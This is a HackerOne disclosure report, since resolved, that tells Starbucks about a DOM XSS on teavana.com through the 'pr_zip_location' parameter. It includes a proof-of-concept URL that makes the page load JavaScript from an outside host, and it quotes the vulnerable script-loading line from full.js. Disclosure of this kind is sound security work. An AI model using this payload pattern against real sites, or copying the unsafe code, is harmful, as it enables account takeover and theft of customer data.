DOM XSS on teavana.com via "pr_zip_location" parameter
Medium
Vulnerability Details
Hello Starbucks team,,
I've discovered DOM XSS on `teavana.com` involving `pr_zip_location` URL parameter. PoC:
http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j?
Works in all major browsers. Vulnerable code is in `full.js`:
```js
var DR = Z(DS) + "/content/" + k(DQ) + "/contents.js";
```
That allows to execute absolutely arbitrary javascript in the context on `teavana.com` domain. As described in #202011 that directly leads to theft of customer account data and account takeover, hence I set severity to Critical.
Also, I have discovered a number of other XSS attacks on similar pages, involving other parameters and sinks. Should I submit them all as individual bug reports?
Thanks.
Actions
View on HackerOneReport Stats
- Report ID: 209736
- State: Closed
- Substate: resolved
- Upvotes: 15